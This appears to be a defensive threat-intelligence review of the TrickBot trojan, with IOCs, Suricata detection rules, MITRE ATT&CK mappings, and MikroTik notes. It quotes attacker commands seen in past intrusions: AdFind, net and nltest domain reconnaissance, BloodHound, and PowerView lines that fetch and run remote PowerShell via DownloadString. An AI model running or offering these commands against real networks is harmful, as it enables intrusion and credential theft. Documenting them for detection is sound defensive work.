Trickbot Malware Review

Technical Details

TrickBot is an advanced Trojan dating back to 2016 that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links.

CISA has drawn attention to this and March 17th 2022 they are aware of recent attacks that use phishing emails. The phishing emails contain links that redirect to the victim to a website hosted on a compromised server. The user gets prompted to verify the photo which downloads a malicious JavaScript file. My understanding is you still need to open the malicious payload which would automatically establish command and control to the Trickbot network.

From here Attackers can use TrickBot Drop Ryuk, Conti ransomware or even serve as Emotet downloaders. Keep in mind Trickbot serves as a vehicle to install exfiltration tools, man-in-the-browser tools and essential a swiss army knife for Ransomware as a Service.

Interesting Read from 2020 when Microsoft started to disrupt Trickbot network


Microsoft Security team has also recently written about disrupting the Trickbot network resulting in the new tactics where MikroTik routers are infected. They then act as proxy servers for their C2 servers devices and create a layer of insulation to protect their C2 servers.

The attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands. We uncovered this attacker method by tracking traffic containing these SSH shell commands.

We know Trickbot often uses 449 then relays off compromised devices as illustrated below.

Indicators of Compromise

  • Port 449 Outbound Stream and/or C2 beacon
  • Port 447 Outbound Stream and/or C2 beacon
  • Port 443 Outbound Stream and/or C2 beacon

Suricata Rule examples from my notes and you can also find more Suricata rules from CISA article

# Trickbot
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"TROJAN Win32/Trickbot Data Exfiltration"; flow:established,to_server; content:"POST"; http_method; content:"name=\"proclist\"";content:"svchost.exe";content:"name=\"sysinfo\"";content:"ipconfig";content:"net view /all";content:"nltest";distance:0; reference:md5,f99adab7b2560097119077b99aceb40d; classtype:trojan-activity; sid:1001001;rev:1; )

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"TROJAN Win32/Trickbot Checkin"; flow:established,to_server; content:"POST"; http_method; content:"/yas8/";http_uri;content:"User-Agent|3a 20|Winhttp 1/0"; http_header; reference:md5,f99adab7b2560097119077b99aceb40d; classtype:trojan-activity; sid:1001002;rev:1; )

MikroTik Mitigations

  • Using default MikroTik passwords.
  • Launching brute force attacks. In other words monitor your devices with SOC and/or SIEM
  • Exploiting CVE-2018-14847 on devices with RouterOS versions older than 6.42. This vulnerability gives the attacker the ability to read arbitrary files like user.dat, which contains passwords.

Historical Trickbot Commands

Trickbot is often seen with cobalt strike and you will see the standard recon which I have provided from older research samples from 2021

The threat actors ran the AdFind utility for domain discovery.

C:\Windows\system32\cmd.exe /C adfind.exe -gcb -sc trustdmp > trustdmp.txt
C:\Windows\system32\cmd.exe /C adfind.exe -f "(objectcategory=group)" > ad_group.txt
C:\Windows\system32\cmd.exe /C adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
C:\Windows\system32\cmd.exe /C adfind.exe -sc trustdmp > trustdmp.txt
C:\Windows\system32\cmd.exe /C adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
C:\Windows\system32\cmd.exe /C adfind.exe -f "objectcategory=computer" > ad_computers.txt
C:\Windows\system32\cmd.exe /C adfind.exe -f "(objectcategory=person)" > ad_users.txt

The following net commands were used by the threat actor.

net user
net group "domain admins" /domain
net group "enterprise admins" /domain

While on systems, we also saw them use the following commands.


The following Nltest commands were executed several times by the threat actors over the course of the intrusion.

C:\Windows\system32\cmd.exe /C nltest /dclist:"DOMAINNAME"
C:\Windows\system32\cmd.exe /C nltest /domain_trusts /all_trusts

The ping command was then used to test connectivity to the domain controllers and other systems.

IEX (New-Object Net.Webclient).DownloadString(''); Get-NetComputer -ping -operatingsystem *server*

Bloodhound was ran for domain attack path enumeration.

powershell -nop -exec bypass -EncodedCommand (base64 code here)

IEX (New-Object Net.Webclient).DownloadString(''); Invoke-BloodHound -CollectionMethods all

The following Powerview commands were also seen invoked by the threat actors for discovery.

IEX (New-Object Net.Webclient).DownloadString(''); Get-NetComputer -operatingsystem *server*
IEX (New-Object Net.Webclient).DownloadString(''); Invoke-UserHunter -username actual_user_name
IEX (New-Object Net.Webclient).DownloadString(''); Get-NetSession -computername actual_computer_name
IEX (New-Object Net.Webclient).DownloadString(''); Get-NetRDPSession -computername actual_computer_name
IEX (New-Object Net.Webclient).DownloadString(''); Find-LocalAdminAccess
IEX (New-Object Net.Webclient).DownloadString(''); Get-NetComputer -ping -operatingsystem *server*

MITRE ATT&CK Techniques

Initial Access [TA0001]

Technique TitleIDUse
Phishing: Spearphishing AttachmentT1566.001TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware.
Phishing: Spearphishing LinkT1566.002TrickBot has been delivered via malicious links in phishing emails.

Execution [TA0002]

Technique TitleIDUse
Scheduled Task/Job: Scheduled TaskT1053.005TrickBot creates a scheduled task on the system that provides persistence.
Command and Scripting Interpreter: Windows Command ShellT1059.003TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.
Command and Scripting Interpreter: JavaScript/JScriptT1059.007TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s C2 server to download TrickBot to the victim’s system.
Native APIT1106TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow.
User Execution: Malicious LinkT1204.001TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link.
User Execution: Malicious FileT1204.002TrickBot has attempted to get users to launch malicious documents to deliver its payload.

Persistence [TA0003]

Technique TitleIDUse
Scheduled Task/Job: Scheduled TaskT1053.005TrickBot creates a scheduled task on the system that provides persistence.
Create or Modify System Process: Windows ServiceT1543.003TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

Privilege Escalation [TA0004]

Technique TitleIDUse
Scheduled Task/Job: Scheduled TaskT1053.005TrickBot creates a scheduled task on the system that provides persistence.
Process Injection: Process HollowingT1055.012TrickBot injects into the svchost.exe process.
Create or Modify System Process: Windows ServiceT1543.003TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

 Defense Evasion [TA0005]

Technique TitleIDUse
Obfuscated Files or InformationT1027TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.
Obfuscated Files or Information: Software PackingT1027.002TrickBot leverages a custom packer to obfuscate its functionality.
MasqueradingT1036The TrickBot downloader has used an icon to appear as a Microsoft Word document.
Process Injection: Process HollowingT1055.012TrickBot injects into the svchost.exe process.
Modify RegistryT1112TrickBot can modify registry entries.
Deobfuscate/Decode Files or InformationT1140TrickBot decodes the configuration data and modules.
Subvert Trust Controls: Code SigningT1553.002TrickBot has come with a signed downloader component.
Impair Defenses: Disable or Modify ToolsT1562.001TrickBot can disable Windows Defender.

Credential Access [TA0006]

Technique TitleIDUse
Input Capture: Credential API HookingT1056.004TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
Unsecured Credentials: Credentials in FilesT1552.001TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials.
Unsecured Credentials: Credentials in RegistryT1552.002TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key.
Credentials from Password StoresT1555TrickBot can steal passwords from the KeePass open-source password manager.
Credentials from Password Stores: Credentials from Web BrowsersT1555.003TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.

Discovery [TA0007]

Technique TacticIDUse
System Service DiscoveryT1007TrickBot collects a list of install programs and services on the system’s machine.
System Network Configuration DiscoveryT1016TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.
Remote System DiscoveryT1018TrickBot can enumerate computers and network devices.
System Owner/User DiscoveryT1033TrickBot can identify the user and groups the user belongs to on a compromised host.
Permission Groups DiscoveryT1069TrickBot can identify the groups the user on a compromised host belongs to.
System Information DiscoveryT1082TrickBot gathers the OS version, machine name, CPU type, amount of RAM available from the victim’s machine.
File and Directory DiscoveryT1083TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.
Account Discovery: Local AccountT1087.001TrickBot collects the users of the system.
Account Discovery: Email AccountT1087.003TrickBot collects email addresses from Outlook.
Domain Trust DiscoveryT1482TrickBot can gather information about domain trusts by utilizing Nltest.

Lateral Movement [TA0008]

Technique TacticIDUse
Lateral Tool TransferT1570Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol.

Collection [TA0009]

Technique TacticIDUse
Data from Local SystemT1005TrickBot collects local files and information from the victim’s local machine.
Input Capture:Credential API HookingT1056.004TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
Person in the BrowserT1185TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage.

Command and Control [TA0011]

Technique TacticIDUse
Fallback ChannelsT1008TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers.
Application Layer Protocol: Web ProtocolsT1071.001TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.
Ingress Tool TransferT1105TrickBot downloads several additional files and saves them to the victim’s machine.
Data Encoding: Standard EncodingT1132.001TrickBot can Base64-encode C2 commands.
Non-Standard PortT1571Some TrickBot samples have used HTTP over ports 447 and 8082 for C2.
Encrypted Channel: Symmetric CryptographyT1573.001TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.

Exfiltration [TA0010]

Technique TacticIDUse
Exfiltration Over C2 ChannelT1041TrickBot can send information about the compromised host to a hardcoded C2 server.

Impact [TA0040]

Technique TacticIDUse
Resource HijackingT1496TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency.

Reference Links